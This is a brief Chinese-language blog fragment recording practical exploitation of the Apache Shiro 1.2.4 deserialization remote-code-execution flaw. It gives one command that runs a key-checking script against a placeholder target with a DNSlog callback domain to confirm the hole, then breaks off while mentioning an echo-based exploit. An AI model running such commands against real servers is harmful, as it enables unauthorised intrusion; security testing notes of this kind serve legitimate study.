shiro RCE (反序列化漏洞)

shiro RCE 攻擊 這篇講1.2.4的反序列化漏洞在實戰中的記錄 第一種比較穩妥的驗證漏洞方式: 1 POC python shiro_check_key.py https://xxx.xxx.xxx.xxx "my0njp.dnslog.cn" DNSlog收到請求(平臺地址:http://www.dnslog.cn/) 2 EXP 這裏的回顯是基於spring框架的,其實可以直接用過監聽
相關文章
相關標籤/搜索